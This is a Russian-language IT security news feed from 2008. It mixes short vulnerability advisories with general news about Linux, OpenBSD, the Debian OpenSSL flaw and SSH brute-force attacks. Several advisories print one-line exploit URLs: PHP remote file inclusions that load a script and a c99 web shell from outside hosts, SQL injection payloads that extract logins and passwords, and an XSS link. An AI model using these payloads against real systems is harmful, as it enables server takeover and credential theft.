Системы безопасности связи
PHP-инклюдинг в microSSys CMS 20-05-2008 Системы безопасности связи
Программа: microSSys CMS 1.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных сценарием index.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php
Exherbo - новый Linux-дистрибутив от разработчика Gentoo 20-05-2008 Системы безопасности связи
Брайан Остергаард, бывший разработчик Gentoo, представил новый
Linux-дистрибутив, получивший название Exherbo.
Работа над дистрибутивом ведется уже несколько месяцев, а идея его создания
пришла вследствие опыта, полученного за годы участия в проекте Gentoo. Среди
основных отличий от своего идеологического вдохновителя отмечаются новый формат
пакетов (схожий с Gentoo ebuild) и некоторые проекты вроде измененной системы
инициализации (init system). На данный момент не существует образов...
Переполнение буфера в Netpbm 19-05-2008 Системы безопасности связи
Программа: Netpbm 10.26
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в
утилите GIFtoPNM. Атакующий может передать специально сформированные данные, что
приведет к выполнению произвольного кода.
Отказ в обслуживании в lighttpd 19-05-2008 Системы безопасности связи
Программа: lighttpd 1.4.19
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных при
обработке SSL соединений. Атакующий может передать специально сформированные
данные, что позволит закрыть SSL соединения легитимных пользователей.
SQL-инъекция в How2ASP.net Webboard 19-05-2008 Системы безопасности связи
Программа: How2ASP.net Webboard 4.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «qNo» сценарием showQAnswer.asp. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://[target]/[path]/showQAnswer.asp?qNo=441%20
union%20select%201,2,Login,4,5,Passwor...
Угрожающий рост количества атак на SSH серверы. 15-05-2008 Системы безопасности связи
В понедельник
вышел отчет
SANS Internet
Storm Center, предупреждающий о значительном росте количества
brute-force атак на SSH серверы. В основе атаки лежит метод подбора
паролей по
определенному алгоритму или по словарю. Отчет основывается на
информации, предоставленной непосредственно пользователями или через
почтовые конференции.
Данные собранные DenyHosts.org подтверждают эту информацию. На
графике видно
резкое увеличение попыток взлома SSH серверов.
Рекоме...
SQL-инъекция в EMO Realty Manager 14-05-2008 Системы безопасности связи
Программа: EMO Realty Manager
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ida» сценарием news.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://target.com/path/pages/news.php?ida=-1/**/union/**/select/**/ 1,2,concat_ws(0x3a3a,id,member_name,member_...
SQL-инъекция в Web Group Communication Center 14-05-2008 Системы безопасности связи
Программа: Web Group Communication Center (WGCC) 1.0.3
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценариями profile.php, picturegallery.php, filebase.php, schedule.php и message.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит
Аккаунты на серверах debian.org заблокированы из-за уязвимости в пакете OpenSSL 14-05-2008 Системы безопасности связи
Администраторы серверов проекта debian.org заблокировали все аккаунты, доступ
к которым осуществлялся посредством аутентификации по открытым ключам в SSH, и
изменили на случайные наборы символов все пароли разработчиков, хранящиеся в
LDAP базе.
Подобный шаг стал необходимостью, после обнаружения в openssl пакете
уязвимости, связанной с возможностью предсказания значений выдаваемых
генератором случайных чисел opennssl, через которую злоумышленник теоретически
может предугадать значе...
Антифашисты ко Дню Победы взломали нацистский сайт 12-05-2008 Системы безопасности связи
В честь Дня Победы хакеры-антифашисты взломали один из русскоязычных популярных неонацистских сайтов.
Хакеры команды Аntifa Hack Team призвали интернет-пользователей прогнать "фашистскую мразь" из сети и вспомнить, что "мир не коричневый, а цветной". На главной странице сайта была выложена фотография вечного огня и размещено поздравление ветеранов, а также "всех уважающих историю своей страны с Днём победы в Великой Отечественной Войне".
Как сообщили предста...
Множественные уязвимости в CMS Faethon 09-05-2008 Системы безопасности связи
Программа: CMS Faethon 2.2 Ultimate
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе или произвольный сценарий в контексте безопасности уязвимого сайта.
Эксплоит:
PHP: http://WwW.4RxH.CoM/22_ultimate/templates/header.php? mainpath=http://rxh.freehostia.com/shells/c99in.txt?
XSS: http://WwW.4RxH.CoM/22_ultimate/search.php?what=&where=articles
Создана программа для «разгона» интеллекта 09-05-2008 Системы безопасности связи
Учёным впервые в мире удалось экспериментально доказать возможность развития подвижного интеллекта у человека. Они создали компьютерную программу, которая стимулирует рабочую память таким образом, что действительно улучшаются способности мозга к обучению и решению неизвестных задач. Хотя рынок подобных программ оценивается в четверть миллиарда долларов (а легальный химический допинг для мозга появится ны рынке только через несколько лет), но учёные всё равно не собираются коммерциализировать сво...
Жалобы на спам стали оружием конкуренции 07-05-2008 Системы безопасности связи
Некоторые компании используют роботов, помечающих объявления конкурентов на
Craigslist как спам, из-за чего те автоматически удаляются с сайта.
Как сообщает Mercury News, всерьез обратил внимание на эту проблему Даг
Келли, владелец фирмы по чистке ковровых покрытий из Сакраменто. В какой-то
момент он стал замечать, что его объявления пропадают. Он добавлял их заново, но
они пропадали опять. С тех пор г-н Келли потратил уже $11,000 на адвоката и
судебные расходы, но зато смог выявить, ...
OpenBSD 4.3 - новая версия открытой операционной системы 05-05-2008 Системы безопасности связи
Проект OpenBSD не изменил своей традиции выпускать новые версии одноименной операционной системы с открытым кодом точно в срок и представил в первый майский день релиз OpenBSD 4.3.
В OpenBSD 4.3 существенно улучшена поддержка множества устройств, что выразилось большим количеством новых драйверов (в частности и особенности это относится к порту OpenBSD/sgi) и исправлений в существующих. У операционной системы появилась поддержка SMP для платформы sparc64 и для MVME188/MVME188A, а также серверов...
Под защитой корпоративного антивируса 05-05-2008 Системы безопасности связи
Как установить и настроить компоненты Symantec AntiVirus Corporate Edition?
Как установить клиента и подключить его к серверу Symantec AntiVirus? На эти и
другие вопросы ты найдешь ответы в статье "Под
защитой корпоративного антивируса" и этом ролике. Кроме того, мы научимся
создавать группы клиентских компьютеров и устанавливать параметры антивирусной
проверки и обновления антивирусных баз.
SQL-инъекция в Joomla Community Builder 25-04-2008 Системы безопасности связи
Программа: Joomla Community Builder 1.0.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
/index.php?option=com_comprofiler&task=userProfile&user=[SQL]
/index.php?option=com_comprofiler&task=us...
Межсайтовый скриптинг в Magnolia Enterprise Edition 25-04-2008 Системы безопасности связи
Программа: Magnolia Enterprise Edition 3.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "query" через сценарий поискового шаблона Magnolia Enterprise Edition Sitedesigner. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Sun откроет Java и интегрирует в Linux 25-04-2008 Системы безопасности связи
В рамках предстоящей конференции JavaOne компания Sun Microsystems сообщит об открытии последних частей кода среды Java. Как отметили в Sun, после осуществления этого шага, Java может быть полностью интегрирована в популярные Linux-дистрибутивы, такие как OpenSuse, Ubuntu или Fedora.
На сегодня в Sun уже ведут переговоры с командами разработчиков популярных ОС о включении последней версии среды Open JDK, которая работает с открытой Java. В открытом доступе Open JDK появится в мае, а полное откр...
Хакеры перешли от спама к веб-атакам 23-04-2008 Системы безопасности связи
За последние 6 месяцев 2007 года интернет-злоумышленники сменили тактику, отойдя от ставшего для многих уже привычным инфицированного спама в пользу атак, основанных на использовании веб-сайтов. Такие данные содержатся в отчете о безопасности корпорации Microsoft.
По данным Microsoft Malware Protection Center, во втором полугодии прошлого года количество веб-троянов и даунлоадеров увеличилось на 300%. Джим Куо, старший специалист Microsoft Malware Protection Center говорит, что при помощи этих ...
Вышла новая версия ядра Linux 19-04-2008 Системы безопасности связи
Вышла новая версия ядра операционной системы GNU/Linux - Linux 2.6.25.
Среди новых возможностей в Linux 2.6.25 отмечается появление поддержки архитектуры MN10300/AM33 и Orion SoC, нового интерфейса для более точного измерения использования памяти процессом, "контроллера ресурсов памяти" (memory resource controller) для контролирования потребления памяти группами процессов, группового планирования в реальном времени.
Вместе с тем, в новой версии Liunx-ядра появилась утилита измерения ...
|
О проекте 
